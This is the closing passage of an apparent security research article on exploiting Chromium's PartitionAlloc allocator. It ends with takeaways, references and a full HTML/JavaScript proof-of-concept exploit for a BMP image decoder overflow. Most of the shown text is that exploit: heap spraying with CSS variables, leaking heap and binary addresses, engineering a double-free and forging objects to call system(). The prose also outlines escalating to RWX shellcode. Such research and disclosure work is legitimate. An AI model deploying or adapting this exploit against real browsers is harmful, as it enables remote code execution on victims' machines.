0x636c616378n /* -1 because ref_count_ + 1 */ - 1n, true);
viewFakeObj.setBigUint64(0x18 + 0x8, system_addr, true);
In this case, I just call `system("xcalc")`.
For a more complex exploit, we can chain more complete gadgets.
Chromium has some super powerful gadgets that allow executing shellcode
easily. You can use `blink::FileSystemDispatcher::WriteListener::DidWrite`,
followed by a fake `BindState`. With these two, we can call any function
by controlling RDI, that is, the first argument of the function.
By combining with `content::ServiceWorkerContextCore::OnControlleeRemoved`,
we can choose a function and N arguments. With this power, we call the
function `v8::base::AddressSpaceReservation::SetPermissions` to make
a memory page RWX. The only thing left to do is corrupt a second
object with a vtable and make it point to this RWX page after copying some
shellcode to it.
If you want to see a full exploit using these techniques, you can check out
the previously mentioned exploits here [11] [13].
---[ 5 - Takeaways, advances, etc etc etc
This article attempts to dissect the most important points about
PartitionAlloc and explain recent techniques like
"double-free2arbitrary-allocation", and completely new techniques like
"cross-bucket overflow".
These techniques can be used, in theory, to exploit any memory corruption
bug in PartitionAlloc, which is fascinating for weaponizing seemingly
insufficient bugs. Many of these techniques are reminiscent of tricks from
recent years in the kernel exploit scene, such as "elastic-objects" and
"cross-cache overflow". High-performance allocators tend to share
vulnerabilities inherent in their operation and performance.
As mentioned above, the memory allocator is an extremely critical
component in high-performance software like a browser, and it must be
extremely simple and fast. This simplicity comes at a cost in security.
Chromium has great security measures like "safe libc++" that can prevent
a large number of vulnerabilities, but after the first memory corruption,
the attacker's scenario is very privileged and few things can stop them.
All recent new mitigations have been focused on mitigating memory
corruptions coming from the JS engine, as is the case with the
well-crafted V8 sandbox. However, this is not enough. Although JavaScript
is an extremely bug-prone subsystem, many other areas continue to have
little research coverage.
---[ 6 - References
[1] https://www.chromium.org/blink/#what-is-blink
[2] https://en.wikipedia.org/wiki/Browser_engine
[3] https://chromium.googlesource.com/chromium/blink/
[4] https://chromium.googlesource.com/v8/v8/
[5] http://libpng.org/
[6] https://chromium.googlesource.com/webm/libvpx/
[7] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-1283
[8] https://chromium-review.googlesource.com/c/chromium/src/+/5241305/7/
third_party/blink/renderer/platform/image-decoders/bmp/bmp_image_reader.cc
[9] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#overview
[10] https://chromium.googlesource.com/chromium/src/+/master/base/
allocator/partition_allocator/PartitionAlloc.md#performance
[11] https://www.darknavy.org/blog/exploiting_the_libwebp_vulnerability_part_2/
[12] https://developer.mozilla.org/en-US/docs/Web/CSS/Using_CSS_custom_properties
[13] https://securitylab.github.com/research/one_day_short_of_a_fullchain_renderer/
---[ 7 - Exploit Code
<!-- ./chrome --no-sandbox --headless --user-data-dir=/tmp/not-exist \
--disable-gpu --remote-debugging-port=9222 --enable-logging=stderr \
http://localhost:8000/exploit.html
-->
<html>
<head>
<script>
const kHRTFPannerVtableOffset = 0x10e5570n;
const kHRTFPannerHeapOffset = 0x22620n;
// blink::FileSystemDispatcher::WriteListener::DidWrite
const kWriteListenerOffset = -0xd401d0n;
// these can be used for a more complex exploit that sets RWX permissions
// and writes shellcode; this is a minimal PoC that only pops xcalc
// blink::FileSystemDispatcher::WriteListener::DidWrite
// const kPolymorphicInvokeOffset = 0xe1cde26n;
// const kRetOffset = kWriteListenerOffset + 104n; // ret instruction
// v8::base::AddressSpaceReservation::SetPermissions
// const kOSSetPermissionsOffset = -0x5a09080n;
// const kShellcode = [
// 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc, 0xcc
// ];
const kSystemLibcOffset = -0x31af290n;
// this string size +0x34, fits into 0x2000 bucket
const kCSSStringCross0x2000 = 'C'.repeat(0x1fcc);
// HRTFPanner sized 0x448, fits into 0x500(?) bucket
const kCSSStringHRTF = 'B'.repeat(0x414); // 0x414 + 0x34 == 0x448
const kCSSString = 'A'.repeat(0x7fcc);
const kSprayPannerCount = 10;
const kTargetCSSVar = '--c13.2';
const audioCtx = new OfflineAudioContext(1, 4096, 4096);
var panners = [];
var audioCtxArr = [];
var delayNodeArr = [];
var srcNodeArr = [];
var heapAddr = -1n;
var fakePannerAddr = -1n;
var chromeBase = -1n;
function die(msg) {
console.log(msg);
throw msg;
}
function str2ab(str) {
let buf = new ArrayBuffer(str.length);
let view = new Uint8Array(buf);
for (let i = 0; i < str.length; i++) {
view[i] = str.charCodeAt(i);
}
return buf;
}
function u64(str, is_little_endian = true) {
if (str.length != 8)
die('string length is not 8');
let ab = str2ab(str);
let view = new DataView(ab);
return view.getBigUint64(0, is_little_endian);
}
function swapEndian(n) {
let view = new DataView(new ArrayBuffer(8));
view.setBigUint64(0, n, true);
return view.getBigUint64(0, false);
}
// function sleep(ms) {
// var start = new Date().getTime();
// while (new Date().getTime() < start + ms) { /* wait */ }
// }
function sleep(ms) {
return new Promise(resolve => setTimeout(resolve, ms));
}
function gc() {
let x = [];
for (let i = 0; i < 200; i++) {
x.push(new Array(1024 * 1024));
}
}
function increase_refs(ref_count_) {
let rs = getComputedStyle(div0);
// the default ref_count_ is 2
for (let i = 0; i < ref_count_ - 2; i++) {
rs.getPropertyValue(kTargetCSSVar);
}
}
async function allocAudioArray(size, data, count) {
const delay = ((size - 0x20) / 4 - 0x80) / 4096;
const prevCount = audioCtxArr.length;
for (let i = 0; i < count; i++) {
let audioCtxDelay = new OfflineAudioContext(1, 4096, 4096);
// allocates ((delay * 4096 * 1024) / 1024 + 0x80) * 4 + 0x20 bytes
let delayNode = audioCtxDelay.createDelay(delay);
audioCtxArr.push(audioCtxDelay);
delayNodeArr.push(delayNode);
}
// FIXME: only the first 0x600 bytes are controlled for now;
// the buffer content gets weird when the size is big
if (data.byteLength > 0x600)
die('data too long for Audio Array');
let buffer = audioCtx.createBuffer(1, 0x600, 4096);
let dstData = buffer.getChannelData(0);
new Uint8Array(dstData.buffer).set(new Uint8Array(data));
for (let i = 0; i < count; i++) {
let audioCtxDelay = audioCtxArr[prevCount + i];
let delayNode = delayNodeArr[prevCount + i];
let srcNode = audioCtxDelay.createBufferSource();
srcNodeArr.push(srcNode);
srcNode.buffer = buffer;
srcNode.connect(delayNode).connect(audioCtxDelay.destination);
// audioCtxDelay.suspend(1);
audioCtxDelay.suspend(0x600 / 4096.0);
srcNode.start();
audioCtxDelay.startRendering();
}
await sleep(500);
}
async function pwn() {
console.log("start");
let div0 = document.getElementById('div0');
for (let i = 0; i < 30; i++) {
div0.style.setProperty(`--sprayA${i}`, kCSSString);
div0.style.setProperty(`--sprayC${i}`, kCSSStringCross0x2000);
div0.style.setProperty(`--sprayB${i}`, kCSSStringHRTF);
}
for (let i = 0; i < 50; i++) {
for (let j = 0; j < 4; j++) {
// spray allocations into slot spans of 2 different sizes;
// in very close to 100% of attempts, the same object ends up allocated
// right after a slot of a different size
const CSSValName = `${i}.${j}`.padEnd(0x7fcc, 'A');
div0.style.setProperty(`--a${i}.${j}`, CSSValName);
const CSSValName2 = `${i}.${j}`.padEnd(0x1fcc, 'C');
div0.style.setProperty(`--c${i}.${j}`, CSSValName2);
}
for (let j = 0; j < 64; j++) {
const CSSValName = `${i}.${j}`.padEnd(0x414, 'B');
div0.style.setProperty(`--b${i}.${j}`, CSSValName);
}
}
for (let i = 10; i < 30; i++) {
div0.style.removeProperty(`--a${i}.2`);
}
for (let i = 46; i > 20; i--) {
div0.style.removeProperty(`--c${i}.0`);
}
gc(); await sleep(500);
console.log("overflowing...");
fetch("/bad.bmp").then(async response => {
let rs = getComputedStyle(div0);
let imageDecoder = new ImageDecoder({
data: response.body,
type: "image/bmp"
});
increase_refs(0xff02); // the overflow will turn 0xff02 into 0xff00
imageDecoder.decode().then(async () => {
gc(); gc();
await sleep(2500);
let ab = new ArrayBuffer(0x600);
let view = new Uint32Array(ab);
// fake CSSVariableData
view[0] = 1; // ref_count
const newCSSVarLen = 0x19000;
// kMaxVariableBytes
// console.assert(newCSSVarLen <= 2097152, 'CSSLen too long');
// length and flags, set is_8bit_
view[1] = newCSSVarLen | 0x01000000;
for (let i = 2; i < view.length; i++)
view[i] = i;
await allocAudioArray(0x2000, ab, 1);
leak();
})
});
}
async function leak() {
console.log("continuing...");
let div0 = document.getElementById('div0');
let rs = getComputedStyle(div0);
let CSSLeak = rs.getPropertyValue(kTargetCSSVar)
.substring(0x15000 - 8);
console.log(CSSLeak.length.toString(16));
let memoryPattern = /\x02\x00\x00\x00\x14\x04\x00\x01(\d+\.\d+)/g;
CSSVars = [...CSSLeak.matchAll(memoryPattern)];
console.log(CSSVars);
if (CSSVars.length < kSprayPannerCount) {
console.log("WARN: insufficient CSSVars found, found vs min:",
CSSVars.length, "vs", kSprayPannerCount);
return;
}
console.log("corrupted with success");
for (let i = 0; i < kSprayPannerCount; i++) {
panners.push(audioCtx.createPanner());
}
for (let i = 0; i < kSprayPannerCount; i++) {
// console.log(`removing --b${CSSVars[i][1]}`);
// not sure why, but the ref_count_ has to be bumped before removing the
// prop to trigger the free
rs.getPropertyValue(`--b${CSSVars[i][1]}`);
div0.style.removeProperty(`--b${CSSVars[i][1]}`);
}
gc(); gc(); await sleep(1000);
for (let i = 0; i < panners.length; i++) {
panners[i].panningModel = 'HRTF';
}
// free two panners after target CSSVariableData
panners[kSprayPannerCount - 2].panningModel = 'equalpower';
panners[kSprayPannerCount - 1].panningModel = 'equalpower';
await sleep(1000);
let hrtfLeak = rs.getPropertyValue(kTargetCSSVar)
.substring(0x15000 - 8);
for (let i = 0; i < CSSVars.length; i++) {
let leak = hrtfLeak.substring(CSSVars[i].index, CSSVars[i].index + 8);
console.log("0x" + u64(leak).toString(16),
"0x" + CSSVars[i].index.toString(16));
}
heapAddr = (u64(hrtfLeak.substring(CSSVars[8].index + 8,
CSSVars[8].index + 8 + 8)) & 0xfffffffffff00000n) + 0xc000n;
fakePannerAddr = heapAddr - 0x959000n + BigInt(CSSVars[8].index);
chromeBase = u64(hrtfLeak.substring(CSSVars[8].index,
CSSVars[8].index + 8));
chromeBase -= kHRTFPannerVtableOffset;
console.log("heap leak: 0x" + heapAddr.toString(16),
CSSVars[1].index.toString(16));
console.log("chrome leak: 0x" + chromeBase.toString(16),
CSSVars[8].index.toString(16));
console.log("fakePannerAddr: 0x" + fakePannerAddr.toString(16));
// search '13.1CCCCC' anon:partition_alloc ; x/gx addr+0x2000-8
console.log("CSSVarData UAF: 0x" + (heapAddr - 0x982000n)
.toString(16));
console.log("hrtfLeak.length: 0x" + hrtfLeak.length.toString(16));
gc();
setTimeout(doubleFree, 1000);
}
async function doubleFree() {
console.log("start free(CSSVariableData)")
let div0 = document.getElementById('div0');
let div1 = document.getElementById('div1');
let audioCtxDelay = audioCtxArr.pop();
let delayNode = delayNodeArr.pop();
let srcNode = srcNodeArr.pop();
let ab = new ArrayBuffer(0x600);
let abFakeObj = new ArrayBuffer(0x600);
let view = new BigUint64Array(ab);
let viewFakeObj = new DataView(abFakeObj);
view[0] = swapEndian(fakePannerAddr - 0x10n);
for (let i = 0; i < viewFakeObj.byteLength; i++)
viewFakeObj.setUint8(i, 0x4a); // "J"
const system_addr = chromeBase + kSystemLibcOffset;
// call qword ptr [rax + 8]
viewFakeObj.setBigUint64(0x0, fakePannerAddr + 8n - 8n, true);
// viewFakeObj.setBigUint64(8, 0xdeadbeefn, true);
viewFakeObj.setBigUint64(0x8, chromeBase + kWriteListenerOffset,
true);
// fake BindState addr
viewFakeObj.setBigUint64(0x10, fakePannerAddr + 0x18n, true);
// start of fake BindState
// 0x636c616378 == xcalc
viewFakeObj.setBigUint64(0x18 + 0,
0x636c616378n /* -1 because ref_count_ + 1 */ - 1n, true);
viewFakeObj.setBigUint64(0x18 + 0x8, system_addr, true);
let rs = getComputedStyle(div0);
for (let i = 0; i < 10; i++) {
div1.style.setProperty(`--sprayD${i}`, kCSSStringCross0x2000);
}
rs.getPropertyValue(kTargetCSSVar);
div0.style.removeProperty(kTargetCSSVar);
gc(); gc();
await sleep(1000);
console.log("start free(AudioBuffer)");
// ((0.466796875 * 4096 * 1024) / 1024 + 0x80) * 4 + 0x20 == 0x2000
let delayToAlloc0x2000 = 0.466796875;
audioCtxDelay.oncomplete = async () => {
// now freelist is circular A => A
console.log("delay nodes deleted, freelist should be circular");
gc(); gc(); gc(); gc();
await sleep(3000);
// overwrite freelist pointer to fakePannerAddr
// copy/paste of allocAudioArray: calling the same function 3 times
// would start compilation and change the heap layout
let audioCtxDelay = new OfflineAudioContext(1, 4096, 4096);
let delayNode = audioCtxDelay.createDelay(delayToAlloc0x2000);
let buffer = audioCtx.createBuffer(1, 0x600, 4096);
let dstData = buffer.getChannelData(0);
new Uint8Array(dstData.buffer).set(new Uint8Array(ab));
let srcNode = audioCtxDelay.createBufferSource();
srcNode.buffer = buffer;
srcNode.connect(delayNode).connect(audioCtxDelay.destination);
audioCtxDelay.suspend(0x600 / 4096.0);
srcNode.start();
audioCtxDelay.startRendering();
// copy/paste
await sleep(500);
// consume freelist entry
div1.style.setProperty('--tick', kCSSStringCross0x2000);
// copy/paste of allocAudioArray: calling the same function 3 times
// would start compilation and change the heap layout
let audioCtxDelay3 = new OfflineAudioContext(1, 4096, 4096);
let delayNode3 = audioCtxDelay3.createDelay(delayToAlloc0x2000);
let buffer3 = audioCtx.createBuffer(1, 0x600, 4096);
let dstData3 = buffer3.getChannelData(0);
new Uint8Array(dstData3.buffer).set(new Uint8Array(abFakeObj));
let srcNode3 = audioCtxDelay3.createBufferSource();
srcNode3.buffer = buffer3;
srcNode3.connect(delayNode3).connect(audioCtxDelay3.destination);
audioCtxDelay3.suspend(0x600 / 4096.0);
srcNode3.start();
audioCtxDelay3.startRendering();
// copy/paste
await sleep(1000);
for (let i = panners.length - 3; i >= 0; i--) {
panners[i].panningModel = 'equalpower';
}
console.log("destructors called")
};
audioCtxDelay.resume();
}
</script>
</head>
<body onload="pwn();">
<div id="div0"></div>
<div id="div1"></div>
</body>
</html>
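The size comments scattered through the listing above are easy to get wrong
when adapting the spray to another bucket, so here is a small standalone
sketch that only re-checks that arithmetic. The helper names (cssAllocSize,
delayAllocSize, delayForSize) are hypothetical and not part of the exploit;
the formulas are copied from the comments in the listing, and the 0x34 is
assumed to be a fixed per-string overhead, which is how those comments use it.

```javascript
// Sizing arithmetic taken from the comments in the listing above.
// Helper names are hypothetical; only the formulas come from the listing.

// Assumed fixed overhead added to a sprayed CSS variable string,
// per the "0x414 + 0x34 == 0x448" comment.
const kCSSVarOverhead = 0x34;

// Allocation size for a sprayed 8-bit CSS string of `len` characters.
function cssAllocSize(len) {
  return len + kCSSVarOverhead;
}

// Buffer size for createDelay(delay), per the comment in allocAudioArray.
function delayAllocSize(delay) {
  return ((delay * 4096 * 1024) / 1024 + 0x80) * 4 + 0x20;
}

// Inverse of delayAllocSize, as computed at the top of allocAudioArray.
function delayForSize(size) {
  return ((size - 0x20) / 4 - 0x80) / 4096;
}

console.log(cssAllocSize(0x414).toString(16));         // 448
console.log(cssAllocSize(0x1fcc).toString(16));        // 2000
console.log(delayForSize(0x2000));                     // 0.466796875
console.log(delayAllocSize(0.466796875).toString(16)); // 2000
```

Both 0x1fcc-byte strings and a delay of 0.466796875 come out at 0x2000, which
is why the listing can swap a CSS variable for a delay buffer in the same
slot size.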
|=[ EOF ]=--------------------------------------------------------------=|